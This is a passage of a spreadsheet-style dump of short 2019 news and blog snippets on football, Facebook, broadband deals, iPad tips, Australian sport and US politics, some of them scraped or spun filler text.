Simeone with his neat technique and combative nature. Renan Lodi, a youngster from Brazil, looks to fill in at left-back for a significant fee of £22.4 million. Keiran Trippier has also joined from Tottenham Hotspur. His attacking prowess was there to see at the World Cup in Russia. His defensive limitations have been highlighted profoundly last season but a coach like Simeone will look to inculcate the defensive acumen in the Englishman. They also strengthened at centre-back with Mario Hermoso, who is one of the most sought after defenders in Spain joining from Espanyol. Adaptation Atletico’s season will be dependent on how quickly the new arrivals adapt to Simeone’s philosophy. If the transition happens quickly, Atletico have enough quality to compete with Real and Barcelona who are also rebuilding. The components are in place for a new Atletico Madrid, it’s time to make it big for Los Rojiblancos. This post The Current State of Atletico Madrid’s Rebuild appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>John P. Mello Jr.</t>
  </si>
  <si>
    <t>A flaw in a Facebook app designed for children under 13 years old allows kids to chat online with people unapproved by their parents. The messaging app is designed to give parents control over who their kids text and video chat with online, but a bug in the software lets a contact approved to chat with one child to talk to another without the approval of the second child's parents. "We recently notified some parents of Messenger Kids account users about a technical error that we detected affecting a small number of group chats," Facebook said.</t>
  </si>
  <si>
    <t>We've become very used to BT dropping gifts and incentives with its fibre broadband deals – it's one of the things that makes them so popular after all. But this week, its outdone itself, offering everything from a free Xbox to M&amp;S vouchers and pre-paid Mastercards. BT appears to be appealing to the masses this week, with two different offers running on its packages. Which one to go for depends on a few different factors. The first of the two deals offers a free Xbox One S or a free Samsung tablet. Scoring the offer means being in a 24-month contract and you have to subscribe to BT Sport alongside your internet to be eligible. For sports fans out there, that will… TechRadar – All the latest technology news The post Score a free Xbox One S or tablet with BT’s excellent fibre broadband deals appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Newcastle United are ready to ‘attack’ a summer transfer for OGC Nice winger Allan Saint-Maximin, according to L’Equipe. The French publication claims that the Magpies are desperate to get a deal over the line for the 22-year-old this summer, with their attack in dire need of reinforcements. Attackers Ayoze Perez, Salomon Rondon and Joselu have all left the club this summer... Source</t>
  </si>
  <si>
    <t>The holding company saw increased spending from clients and is beginning to see the impact of its Acxiom acquisition. Read More</t>
  </si>
  <si>
    <t>Infant formula maker Bubs Australia says it made $18.5 million in the fourth quarter, more revenue that it made all year in fiscal 2018.</t>
  </si>
  <si>
    <t>William Finnegan discusses his reporting on the best surfer in the world, Kelly Slater, and how his revolutionary wave machine both advanced and disrupted the surfing industry. Some surfing footage courtesy of www.worldsurfleague.com Still haven’t subscribed to The New Yorker on YouTube ►► http://bit.ly/newyorkeryoutubesub Surfing on Kelly Slater’s Machine-Made Wave | The Backstory | The […] The post Surfing on Kelly Slater's Machine-Made Wave | The Backstory | The New Yorker appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Canadian police have confirmed two sightings of the teenage fugitives who allegedly killed Australian Lucas Fowler and his American girlfriend.</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/2019/7/23/20707569/snapchat-snap-earnings-users-added-filter-gender-swap Snap adds 13 million daily active users as it gets serious about global expansion Illustration by Alex Castro / The Verge Snap continues to rebound, adding 13 million daily active users to Snapchat this past quarter. Those added users bring the total number of people using the app around the world every day to 203 million, which is the highest it’s been since Snap went public. The growth indicates that Snap’s investment in product features for a more global user base is paying off and that its luck in creating viral face filters is helping it grow, too. Snap estimates that between 7 and 9 million users joined because of the face filters with the remaining 4 to 6 million users being attributable to the company’s broader product focuses. Last quarter, it released an updated, optimized version of its Android app after years of Android users complaining about a… Continue reading… Source: https://www.theverge.com/2019/7/23/20707569/snapchat-snap-earnings-users-added-filter-gender-swap The post Snap adds 13 million daily active users as it gets serious about global expansion appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Product Name: membership | Owerly Click here to get membership | Owerly at discounted price while it’s still available… All orders are protected by SSL […] The post membership | Owerly appeared first on Sell Me Something. Source link</t>
  </si>
  <si>
    <t>A commission examining the circumstances that allowed a nurse to kill eight elderly patients in her care is expected to deliver a report Wednesday aimed at preventing such crimes in the future.</t>
  </si>
  <si>
    <t>Justin Fris</t>
  </si>
  <si>
    <t>Can the Slammers sign off the 2019 season in style?</t>
  </si>
  <si>
    <t>Cricket is the fastest growing sport in Sweden. Its popularity is being driven by the arrival of migrants from across Asia. And as Al Jazeera’s Paul Rhys reports from Malmo, the sport is helping refugees from Afghanistan integrate into their new home. Source link</t>
  </si>
  <si>
    <t>Former Italian international Alessandro Diamanti joins the A-League's newest club for their inaugural season.</t>
  </si>
  <si>
    <t>The coaching merry go round might not have stopped with Port Adelaide's coach Ken Hinkley under pressure with a review at year's end.</t>
  </si>
  <si>
    <t>How to take off &amp; generate speed is one of our most requested videos of 2018, and finally it’s here. Learning how to surf is an awesome experience, but often, one speed bump continues to arise for many beginners. And that is the take off, the pop up, and generating speed. We’ve taken the fundamentals […] The post How To Surf | Take Off, POP UP &amp; Generate Speed appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Cristiano Ronaldo Can Charge Up To £784,000 Per Instagram Post No sports star in the world can charge more for an Instagram post than Juventus forward Cristiano Ronaldo. Anyone wanting Cristiano Ronaldo to post an ad on his Instagram page will have to pay a lot of money, with Hopper HQ revealing the Portuguese superstar leads the way and can charge up to £784,000, beating Neymar into second place on just £580,000. It’s no surprise really that the former Real Madrid star is so far ahead of his ‘rivals’ considering that he has so many more followers on the social media platform. The 34-year-old has a whopping 176,709,627 followers on ‘Insta’ in comparison to Lionel Messi’s 126,450,038 followers, although the Argentinian isn’t in second place on the money list. The top ten is absolutely dominated by footballers with David Beckham following the top three and NBA star LeBron James the highest non footballer in the list, charging up to £219k per post. Ronaldo isn’t just high on the list of sports stars, the five time Ballon d’Or winner is third on the list, only behind Kylie Jenner and Ariana Grande, on the overall list. As well as Beckham in the top five there’s further proof that no longer being an active footballer doesn’t hamper your earning ability. Former Brazil star Ronaldinho comes in at number six on the list, earning £206,000 per post on social media. Interestingly Gareth Bale’s protracted and messy departure from Real Madrid doesn’t seem to have dented his earning power, even though he’s barely been a first teamer at the Bernabeu in the last couple of years. The Welshman can charge people £175,000 to post, which is roughly 10 minutes of his wages if he makes the jump to the Chinese Super League. In January Ronaldo became the first person to reach 150 million followers on Instagram and only Ariana Grande has joined him on the landmark since. What would you post on Instagram if you were paid for one post? This post Cristiano Ronaldo Can Charge Up To £784,000 Per Instagram Post appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Donald Trump renews his attacks on prominent African-American congressman Elijah Cummings, and accuses black civil rights activist Reverend Al Sharpton of hating "whites and cops".</t>
  </si>
  <si>
    <t>FPL Virgin</t>
  </si>
  <si>
    <t>Following on from the popular ‘FPL Season From Hell: Where Did It All Go Wrong?’ article (which can ...</t>
  </si>
  <si>
    <t>ianvisits</t>
  </si>
  <si>
    <t>This is an elevated pocket park next to London Wall that’s both open to visit, but sufficiently off the obvious routes so hardly known. It actually sits astride part of the aspirational failure that was the 1960s Pedway network, designed to create a series of elevated walkways around the City to avoid road traffic. That idea never took off, with bits built here and there, and for a few years this part of the walk was itself a dead-end, so no one came up here. Then the pedways got a renaissance, a new bridge links either side of London Wall, and what was an empty paved courtyard is now a delightful park. It’s also technically part of the office block next door, but open to the public to use. The original building consisting of the Tower and Podium structure was constructed between 1962 – 1963 by Wates, and refurbished in 1984. Throughout that, the podium space remained a rather empty area to get from here to there, some planting and wooden benches, but nothing to make you want to stop. However, another revamp of the building on 2012 saw the garden added, turning windswept emptiness into pleasing places to sit and relax. The design of the area is based on a landscape strategy prepared by Farrer Huxley Associates who tracked how people used the old space, and proposed the design that’s there today. In addition to the considerably increase planting and seating spaces, they’ve also spread the design around the corner which used to be totally devoid of anything, so the usable space is about a third more than it was before. That also means the planting is visible from street level as well, where before it was just a plain balustrade. Long lings of elevated planting provide the equally long lengths of stone borders that ever-so-coincidentally provides lots of seating space. The use of tall planting around the centre was deliberate, to deal with a wind problem on the site so that it’s not to annoying for people sitting here. They’ve also put some benches inside sheltered canopies for those who want to sit outside on very windy days. A “meeting room” also exists around the corner, although being right next to London Wall road means conversations might be a struggle. There used to be a restaurant on the podium as well, Young Bean, but the lack of interest in the location meant it wasn’t popular and closed down. The new space allows for a coffee hut, and considering that it’s a much more enjoyable space to visit, that might be added one day. Although the design is possibly a bit too similar to other gardens that are popping up after being “modernised”, they have done a remarkable job in turning a place to avoid into a place to visit, linger even.</t>
  </si>
  <si>
    <t>In August the LifeStyle channel screens a curious three part UK series, Pilgrimage: Road to Rome. This features a range of celebrities, including Stephen K. Amos and Eurovision‘s 1970 winner Dana (not to be confused with Israel’s Dana International) travelling to meet the Pope. Eight celebrities of differing faiths and beliefs strap on backpacks and have 15 days to tackle 1,000km of the ancient Via Francigena pilgrimage, from the Italian Alps to Rome, where a private audience with the Pope awaits. They start their pilgrimage in the Alps, just before the Swiss-Italian border. Will this journey of a lifetime change the way they think about themselves and their beliefs? Actors Les Dennis and Lesley Joseph, professional dancer Brendan Cole, comedians Stephen K Amos and Katy Brand, Olympic long jump champion Greg Rutherford, Irish Eurovision Song Contest winner Dana and television presenter Mehreen Baig live as modern-day pilgrims. Tuesdays from August 6 at 9.30pm on LifeStyle.</t>
  </si>
  <si>
    <t>submitted by /u/CaptMeelo [link] [comments]</t>
  </si>
  <si>
    <t>It’s summer vacation 2019 on Clearwater Beach, Florida and Hulk Hogan’s Hangout restaurant is about to open. Let’s take a first look at Hogan’s Hangout and Beach Shop and explore the North part of Clearwater Beach also home to world wrestling super star Hulk Hogan. Let’s begin at Pier 60 and later grab a Pina […] The post Hulk Hogan’s Hangout Restaurant NEW to Clearwater Beach, Florida! Summer Vacation 2019 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>The iPad can’t function for you when you do not use it correctly. You must learn all about its functionality. Check out the information in this article to learn how to use your iPad to the fullest. There is a way that you can check all the running applications that you have at a given time. Just hit the Home button twice and a list will show up on the screen. If you tap on a app in the bar, you can quickly switch to it. When you’re done, swipe the screen downwards to hide the bar. It is easy to get to all the apps that are currently running on your iPad. If you click the Home button twice, you can see the running apps along the screen’s bottom. To switch between apps, just tap the one you want to access. Just swipe your finger down to get rid of the bar. Make sure that you budget the amount that you spend on apps. Because your credit card is on file with the iTunes store, it is not hard to go overboard buying apps and then get a nasty credit card statement shock. So, it’s important to keep your eye on what you’re spending. Monitor your iPad app spending. It’s very common for iPad users to run up large bills buying music and apps. Hence, you should set a limit on how much to spend on them. Sometimes you will get a frustrating wifi-network prompt during the day. By going into your settings, you can choose to turn off this feature. If you don’t want further prompts, turn off the last option found on the page. If you’ve got a frozen iPad, do a soft reset which will reboot the device. This is done by holding your power button and your home button down at the same time for a few seconds. Wait for your iPad to reboot. To force close an app, just hold down the home button until it closes. Keep track of the apps your are running. While you work on other things, some apps will continue running on your iPad in the background. To see the things that your iPad is running, double click the Home button. You will see them in a bar located at the bottom. When you are finished, swipe down to make the bar disappear. Know which apps are running on your iPad. Lots of iPad applications can work in the background as you complete other tasks. In order to view currently running applications, just click your Home button twice. This will show you the current apps at the bottom. Click the home button once or do a downward one finger swipe to close the bar. Does the battery indicator on your iPad distract you? Turn it off, then! Begin by going to your iPad’s Settings. Look under General to find Usage. Here you can turn off the battery display. The email app will show you the first two lines of an email’s text unless you change this setting. In some cases, you may want to see more before you open it. Go to ‘mail’ under ‘settings’. Then click on Contacts, then click Calendar and then finally select Preview Mail Options so that you can see more at one time. Do you hate having to tap the bookmark icon in order to open your bookmarked sites? Simply enable your bookmarks bar on a permanent basis to keep your favorite websites a click away. Under the Safari menu in Settings, choose the On option next to Always Show Bookmark Bar. By using shortcuts, sending messages is easy. One example is double tapping space to add a period. Therefore, you don’t have to manually do this yourself, which will help you save time. It’s time to experience all of those fascinating applications for yourself. All you must do is to click Home twice, and they appear at the lower edge of the screen. Use this to avoid scrolling around to find what you need. If you want to maximize your iPad’s potential, apply the information that you have learned here. Suddenly, a whole new world will be opened up to you. Take advantage of it. iPads are great for music, but are you familiar with podcasts? These are radio presentations that are between two minutes and two hours in length, and they cover a variety of subjects. If music is something you have had enough of lately, give some podcasts a try. No matter what your interests are, you can bet there is someone making a podcast to suit you. As you may have learned reading this article, there are a plethora of things you should know about compare voip call rates. Using the helpful advice from this article and many others, you no longer have to feel overwhelmed about this subject. This information will help you as you move forward, if you let it.</t>
  </si>
  <si>
    <t>Our Division Welling’s of Stittsville is hiring for Full time &amp; Part time permanent positions of Cooks, Bartenders, Baristas, Servers, &amp; Dishwashers. If interested, please join us at one of two job fairs happening in Kanata, Ottawa, ON August 8th and August 9th 2019 between 9am to 3pm. Please see below for the more information .. Read more</t>
  </si>
  <si>
    <t>Penalty by US government reflects scale of breach, first reported by the ObserverFacebook will pay a record $5bn (£4bn) penalty in the US for “deceiving” users about their ability to keep personal information private, after a year-long investigation into the Cambridge Analytica data breach.The Federal Trade Commission (FTC), the US consumer regulator, also announced a lawsuit against Cambridge Analytica and proposed settlements with the data analysis firm’s former chief executive Alexander Nix and its app developer Aleksandr Kogan. Continue reading… Read More</t>
  </si>
  <si>
    <t>The competition watchdog's digital platform report signals an intention to commence legal proceedings against Facebook and Google.</t>
  </si>
  <si>
    <t>South East Melbourne Phoenix gambled on signing Mitch Creek as their marquee player while he was still chasing a return season in the NBA but it has paid off with Creek to join them for this NBL season.</t>
  </si>
  <si>
    <t>Kent: 1 or 2 Nights for Two with Breakfast and Option for Seven-Course Tasting Menu at the 5* Frasers Hotel The post Kent: 1 or 2 Nights for Two with Breakfast and Option for Seven-Course Tasting Menu at the 5* Frasers Hotel appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>SHARON OSBOURNE, a huge supporter of Freddie Mercury, has criticised the Queen biopic Bohemian Rhapsody. Daily Express :: Films Feed Bohemian Rhapsody and Brian May SLAMMED by Sharon Osbourne for THIS Freddie Mercury reason</t>
  </si>
  <si>
    <t>It’s really a good idea to plot diverse trips differently to really make the many of them because they build different suffers from. McCabe, S. In the event the evening eventually got, he / she appeared to be extremely nervous, regarding the journey. custom management essay Parents normally confound the high cost of the family holiday vs .. Additionally, there are different ways to help originating from a “stay-cation” (the spot where you tend not to endeavor further than your state, community, and even neighborhood). RELATED:Are Household Family vacations a Valid Explanation pertaining to Lost Education? RELATED:Inexpensive Family members Trips Which don’t Really feel Cheap RELATED:Are Family Vacations a legitimate Reason for Lost Classes? We’ve 3 aunts who’ve 2 children just about every. This town has been a prettiest spot I’d seen. By using a holiday vacation users.drew.edu persons become a little more prosperous. I appreciate winter months in addition to holidays are the attractive element with this year. Summer Program Reviews Now, this may not be to say that I don’t get pleasure from along with my own alternative cousins. Combine gift buying along with digital camera tricks It helps the crooks to remove disruptions in order to finish off their job. We all drank quite a few excellent wine beverages and from now on I’m sure the key reason why in france they are so like to show off their own vino. All Opinions Even so, they aren’t fortunate by using countless vacations. Otherwise, you could opt to donate most of your finances at first ideal for journey to a new non-profit trigger. That is one of the reasons the key reason why my spouse and i needed to vacation in Euro disney. Here i will discuss Getaway articles regarding varying program plans to assist you to with similar as part of your audit. A great deal of thrilling actions usually are structured throughout these vacations each year but continue years’ winter weather trips were all greater unique. It really is exciting to travel from breaks with your mom and dad along with littermates and prepare remembrances so that you can prize forever. All Opinions But some often it occurs we continue to keep doing their best to the vacations nonetheless never ever carry out these. The actual journey all around in which hill seemed to be unique. While from a family this does battle a whole lot having connecting has made everyone genuinely cherish just about every minute that we spend with my household. Whilst earlier nearly all of this holiday seasons moved wasted because I personally lost period delaying. I’d been overjoyed having sensations that we can not simply satisfy a desire connected with my personal, but provide a holiday vacation for my kid that he would not ignore. “Family holiday season is sought after by way of children, in when along with prolonged after that in their recollection,In psychologist plus best-selling article author Oliver John explained to The Communicate. “It’s information about talking spam with your mother and father, spreading the soft ice cream and instances of their time in which your hobbies will be sincerely factored in. All Poetry Thus, everyone ended up excited about sales page planning to this old city. Most of us excitedly lose time waiting for on this occasion of year and have absolutely a lot of blueprints seeking the identical. That needs a vacation? Considering sociable travel related. Mothers and fathers must make them children priority and make an investment of time. When you are thus upset about taking a trip, might be there are certain things otherwise stopping you. It’s superior to studying alone. Summer Guide Paris is famous world-wide for the beauty and history. Mom and dad really need to spend its valuable bucks sensibly. Recreational areas like Disney land get for an extended time dished up as being a ethnic mark for country in which grows off getting kept amused. I treasure the days invested on your Shimla holiday getaway and wish most of us embark on a lot more these types of tours inside the times ahead. For the present time, while, consider a number of in which evidence.</t>
  </si>
  <si>
    <t>A new season of SBS' observational series Untold Australia opens with relationship coach Liz Dore, who specialises in working with young people with intellectual and learning disabilities.</t>
  </si>
  <si>
    <t>Australian Rugby League Commission boss Peter Beattie has asked for feedback from the 16 club and two state chairs over the embattled director.</t>
  </si>
  <si>
    <t>Facebook CEO Mark Zuckerberg says the company will spend “however long it takes” to get regulators and others on board before launching the Libra cryptocurrency project. Speaking during a quarterly earnings call on Wednesday, the social media giant’s founder sought to assure investors that Facebook would act responsibly with its development of Libra, the ambitious crypto project revealed last month as a potential payments rail for unbanked individuals. Facebook worked with “prospective members” of its governing council, the Libra Association, to publish its white paper last month in order to address questions about it, he said. “We’re committed to working with policymakers to get this right.” The company initially said it aims to launch the currency in the first half of 2020, but the pushback from regulators and politicians has called that timeline into question. In response to an analyst’s question about timing, Zuckerberg said Facebook’s approach to Libra is “to try and have a very open dialogue,” and that unlike a few years ago, when the company might have just launched a new product, today Facebook tries to detail what specific “ideas and … values we think an eventual service should have.” “We’ve opened a period of, however long it takes to address regulators and different experts and constituents’ questions about this and then figure out what the best way to move forward is,” Zuckerberg said, adding: “That’s certainly what we’re planning to do with Libra. So we worked with the 27 other members of the Association to publish the white paper to put the idea out there, expecting that this is a very important and heavily regulated area and that there were going to be a lot of questions. And we’re going to have to work through that.” Staying on message Zuckerberg’s comments echo statements made by David Marcus, Facebook’s blockchain lead. Marcus, who used to sit on the board of crypto exchange and Libra Association member Coinbase, testified before Congress last week in back-t0-back hearings in an attempt to assure legislators that Facebook would not launch Libra until all regulatory questions have been answered. However, Marcus stopped short of promising to halt development entirely. “We are trying to provide a safe and stable and well-regulated product, so that’s always been the strategy and we’ll continue to engage here,” Zuckerberg concluded on Wednesday. Mark Zuckerberg image via Frederic Legrand – COMEO / Shutterstock</t>
  </si>
  <si>
    <t>QuakeCon is an annual celebration of all things Bethesda. Held in Dallas, Texas, the gaming convention sees thousands of Bethesda fans from around the globe gathering to hear the latest announcements about – and get their hands on – the developer’s most anticipated upcoming titles. But this year, parent company ZeniMax Media decided to include its European fans in the celebration by establishing the first ever QuakeCon Europe in London – a free public event that aims to bring the QuakeCon “vibe” to those outside North America. We attended QuakeCon Europe on its media day but found that, when it comes to capturing the essence of QuakeCon, there&amp;… TechRadar – All the latest technology news The post QuakeCon Europe 2019: the highs and lows of Bethesda’s European event appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Nick and Karen Munroe posted a photo: Lillie’s.. There is nothing better than enjoying the</t>
  </si>
  <si>
    <t>🔔 Follow us for regular uploads: http://bit.ly/SubscribeToCircus 🎵Free Download: https://linktr.ee/circus10years 🎧 Our latest releases on Spotify: http://bit.ly/CircusPlaylistSP 💽 Check out our Circus Mixtape playlist: http://bit.ly/CircusMixtapeYT ➡️Follow Taim: Facebook: http://bit.ly/Taim_FB Twitter: http://bit.ly/Taim_TW Soundcloud: http://bit.ly/Taim_SC Instagram: http://bit.ly/Taim_IG ➡️Follow Flux Pavilion: Facebook: http://bit.ly/FluxPFacebook Twitter: http://bit.ly/FluxPTwitter Soundcloud: http://bit.ly/FluxPSoundCloud Instagram: http://bit.ly/FluxPInstagram ➡️Follow Circus Records: Facebook: http://bit.ly/CircusFbook Instagram: http://bit.ly/CircusInstagram Twitter: http://bit.ly/CircusTwitter […] The post Flux Pavilion – Symphony feat. Layna (Taim Remix) appeared first on Dubster.</t>
  </si>
  <si>
    <t>Watch day 2 of the Junior Swimming Championships, live from the Repsol Sport Centre, Calgary, Alberta. CBC | Sports News 2019 Canadian Junior Swimming Championships on CBC – Finals – DAY 2</t>
  </si>
  <si>
    <t>Arabic Mongolian Dictionary – travel dictionary to translate Arabic to Mongolian. Click on the list to show Arabic or Mongolian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Arabic Mongolian Dictionary →</t>
  </si>
  <si>
    <t>Staff writer</t>
  </si>
  <si>
    <t>People looking to build in Western Australia’s South West will soon have a whole new resource at their disposal as Summit Homes prepares to launch a new, state-of-the-art inspiration hub and showroom.</t>
  </si>
  <si>
    <t>Findlay Grant</t>
  </si>
  <si>
    <t>Scuderia Toro Rosso driver Alex Albon has said that the Hockenheimring, which will play host to the next race of the season, the German Grand Prix, is “what I would call a ‘standard’ track”. Albon said that although they were more competitive last time out at Silverstone than they have been previously this season, he knows the race in Germany is not going to be easy. It will also be the first time that he has tackled the circuit in a Formula 1 car. There has so far not been much in the difference of points between Albon and his more experienced team-mate, the Russian Daniil Kyvat this season. Albon currently has seven points, while Kyvat has twelve. “In Silverstone, we were definitely more competitive than at the previous two races and we were able to find a much better balance with the car. We managed to get into Qualifying 3 again and the car generally felt good. “However, that doesn’t mean I expect an easy weekend in Germany, which will be another tough event for us. We have made progress and we know which parameters we need to work on and it’s going in the right direction.” he said. The British driver has had prior experience racing at the circuit in GP3 in his junior career, but these outings did not go as he would have hoped. “As for my memories of Hockenheim, I remember qualifying on pole there in GP3 and then I crashed out of the first race while I was leading. Then I also crashed in Race 2! “It’s an okay track, it’s what I would call a ‘standard track’, with all the usual elements and some nice corners like the one leading into the Stadium, which has a cool atmosphere with all the fans.” He added that the track layout provides plenty of opportunities to overtake, although one must be careful to look after their tyres during Qualifying or run the risk of destroying them before the end of the lap. “Overtaking is pretty good, especially as you have a long back straight going into a hairpin, which always provides a passing opportunity. It can be hard on the tyres and even in Qualifying, you have to make sure you look after them on a single lap, or the tyres can be shot by the last couple of corners. “The tarmac is old, so the surface is much rougher than at some of the newer re-surfaced circuits. It’s something we will be keeping an eye on.” Albon will be hoping to finish in the points for the next few races, and head into the summer break on a high.</t>
  </si>
  <si>
    <t>Welcome to LocalAdz, your total online marketing results firm. We specialize in High quality WordPress Web Page Design, Mobile Web Design and are Web Search Engine Management experts. Anything you want to be recognized for on the internet, we can make you a VISIBLE authority in your geographic location. Shop in Longview TX. We use cutting edge methods for your keywords that are PROVEN and EFFECTIVE at increasing YOUR position in the search engines! We are a complete custom Premium Website Design, SEM Longview and Internet Marketing firm. We can meet all of your Custom Web Design and Search Engine Management needs. We are experienced Web designers and search engine managers using the latest technology and online marketing techniques. We use the latest Web standards to meet your goals and expectations. We create websites and mobile websites that function across all browsers and mobile devices and load in the blink of an eye. Affordable Custom Website Design in Longview TX | Best Mobile Websites We utilize W3C compliant, search engine friendly code in all of our projects. We bring a user-centric philosophy and process to each and every decision, with our experience in usability and design. In short we do more than just design websites that are “pretty”. We design websites that help convert visitors into clients! We want to make Internet Marketing an accessible and successful addition to any marketing plan. We are a leading Internet Marketing and Search Engine Management Longview TX Specialists. We can help drive more unique visitors to your website and convert them to buyers. We have been designing Websites and providing SEM since 2009; there have been MANY changes over these last few years. As technology has improved so has the web. It is more important than ever to keep up with the industry standards and what Google expects to see in web design. Because the best website on the planet will do you no good if people cannot find it. Good SEM and quality Web Design go hand in hand if you truly want to dominate your competition. Let LocalAdz help. We are not only one of the best SEM Companies in Longview, we also offer top notch web design and development. Whether you need just a simple informational HTML website, or a custom built database, or anything in between we got it covered. Shop for Web Design Company in Longview TX. More Longview TX Information Longview Texas Weather Nearby Locations Web Design Services in Mc Calla AL Web Developers in Clinton MS Web Developer in Sunset Beach NC Web Designers in Kelso MO Web Development in Roxbury CT Website Builders in Ethel WV Web Design Portfolio in Mechanicsburg OH Web Designers in Harlan IA Website Developer in Leitchfield KY Website Design Company in Dahlen ND Longview Texas Map Republished by Blog Post Promoter The post Web Design Company in Longview TXOriginally Posted on August 13, 2013 and reposted on July 26, 2019 appeared first on Free Consultation (702) 518-6567.</t>
  </si>
  <si>
    <t>Peter Menzies</t>
  </si>
  <si>
    <t>Several years ago, I by chance encountered a backbench member of Parliament who asked in a very straightforward fashion why we at the Canadian Radio-television and Telecommunications Commission (CRTC) didn’t “do something” about CBC. Mildly startled, I replied that if something was to be “done” about CBC, Parliament should just go ahead and do it. But no one ever really does anything about CBC other than to either make it anxious about its funding, or make it happy about its funding and hoping that it will continue. These days, it’s mostly the latter. The exception appears to be the commercial English-language TV world, where viewership of its evening news broadcast The National has plummeted. Alarmed reports abound that it has considered boosting primetime ratings through some form of programming based on serial murderer and rapist Paul Bernardo. Elsewhere, things are going swimmingly. The commercial-free radio – to which I often listen for close to four hours a day – maintains sound ratings around its excellent locally-focused, apolitical and informative morning and afternoon drive shows. In between, daytime programming is somewhat more social-agenda-driven, while the six o’clock news followed by As It Happens generally segues into an evening of programming that ranges from 21st-century sexual exclusion angst to pining for the halcyon days of the nation’s Spanish Civil War veterans and radicals. Notwithstanding my unexplainable personal fascination with the content, this fetishizing of dreamy 1930s activism leads many conservative-minded people to call for an end to CBC. But never mind that. Very few of us listen to evening radio. Online is where it’s at. There, CBC/Radio Canada goes toe to toe with traditional broadcasters and newspapers fighting for readers, viewers, listeners and, most of all, dollars. That’s where it sows. And that’s where it reaps. And that’s where, if something needs to be “done” about CBC – which, in both the online and television worlds, is a full-blown commercial operator – it should be done. The nation’s television broadcasting world has forever been distorted by the existence of a publicly-funded entity such as CBC that competes not only for viewers but for advertising income. It has always been entirely unfair to the private sector that its own tax dollars are used to compete against it. Publicly-funded radio may compete with the private sector for listeners but never for money. About 40 per cent of Canada’s advertising dollars are spent online, making that medium by far the most dominant, followed by TV a good 10 points behind, then radio and newspapers. That means that by employing an aggressive online strategy, CBC now competes for a share of about 70 per cent of the advertising dollars at play in the market. So newspapers, radio and other Internet platforms are now, in addition to television companies, paying taxes that subsidize their competition to their detriment. Meanwhile, the newspaper industry queues shabbily at the public trough, sheepishly awaiting a $600-million federal handout from those it’s expected to report upon with neither fear nor favour, knowing that in doing so it has forever undermined the credibility of each and every one of its journalists. As Andrew Coyne, one of the few commentators willing to risk his employer’s or the government’s wrath (see fear and favour above) stated recently: “So far as we were relieved of the obligation to find willing readers, we would become even more pompous and self-absorbed than we are already. As the beneficiaries of a bailout ourselves, we could never again criticize any other industry seeking to be rescued from its own mistakes. God knows we would be in no position to lecture anybody on conflict of interest.” So get CBC out of the advertising business on all of its platforms. Make its content available to other media for free within Canada so they can reap some of the investment created by their tax dollars. That may do little to appease those who dislike CBC’s politics, but it will go a long way to helping ensure there’s room for other voices in the marketplace that don’t have to depend on the party in power for their existence. Peter Menzies is a former newspaper publisher and vice-chair of the CRTC, and advises tech companies on regulatory policy (the views here are his own). © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post What can – and should – be done about CBC appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>$1 Million Wednesday 24 July 2019 – Draw 3889 27 22 26 15 20 23 35 6 Results for Wednesday Lotto Draw 3889 The Lotto Results have been released for Tonight’s Wednesday Lotto You can view the full Lotto Results online with us at NetLotto. https://www.netlotto.com.au/Lotto-Results We provide all Australian Lottery results quickly and easily online, and our new IPhone App means your never a click away to find out if you were a winner. Check out the new App here Love your Wednesday Lotto ? For Wednesday Lotto, always buy tickets and get results online or by phone with NetLotto. We are the smart choice for all things Wednesday Lotto! Give the Wednesday Lotto a go. You never know where it may take you! Join Netlotto today to get lotto tickets and syndicates https://www.netlotto.com.au</t>
  </si>
  <si>
    <t>[source] 2 0</t>
  </si>
  <si>
    <t>While Summer League is typically a developmental showcase for players, a new summit has attracted the league’s fastest rising assistant coaches to workshop their own craft. Source: Sports Business News</t>
  </si>
  <si>
    <t>ECZEMA is a condition that causes skin to become itchy, red, dry and cracked, and can cause great irritation for the sufferer. Different forms of treatment can work for everyone, but one baby found relief in a high-street cream. Daily Express :: Health Feed</t>
  </si>
  <si>
    <t>President Donald Trump hardly ever resists the urge to congratulate himself for single-handedly catalyzing a stock market boom, the likes of which Wall Street has never seen. Last month, for instance, he concluded a tweet touting the Dow Jones Industrial Average’s historic June rally with the following statement: “Thank you Mr. President!” But there’s a dirty little secret Trump doesn’t want you to know about: The stock market actually fared better under former President Barack Obama. Obama Stock Market Leaves ‘Trump Bump’ in Its Dust That’s according to Bill McBride, author of the Calculated Risk blog, who published a chart comparing the performance of the S&amp;P 500 during the Obama and Trump administrations. The S&amp;P 500 fared far better during Obama’s first term than it has under Trump, but, as always, there’s a catch. | Source: Calculated Risk At this point in Trump’s presidency, the S&amp;P 500 has surged 31%. That’s an impressive run, but it pales in comparison to the parabolic 63% climb the index had already enjoyed by this point in Obama’s first term. Still, the Trump and Obama stock markets could soon converge – at least temporarily – if the all-but-assured Federal Reserve interest rate cut gives the S&amp;P 500 the boost many analysts expect. But, barring an extreme divergence from cyclical market trends, it’s unlikely Trump’s stock market will outperform Obama’s heading into the 2020 election. Yes, There’s a Catch Of course, comparing the stock market’s performance under different presidential administrations might be even less worthwhile than comparing apples and oranges, as MarketWatch notes in its light-hearted write-up of McBride’s blog post. For example: President Obama assumed office at the tail-end of a brutal equities sell-off, while Trump entered the White House with stocks nearly a decade into a bull market. President Obama took office at the tail end of a stock market collapse, allowing him to oversee a massive S&amp;P 500 recovery during his first year in office. | Source: Yahoo Finance Consequently, McBride doesn’t draw any conclusions from his chart, and he doesn’t think that you should, either. However, as he notes, that’s precisely what people will do anyway since it’s so tempting to boil down complex financial market forces into a 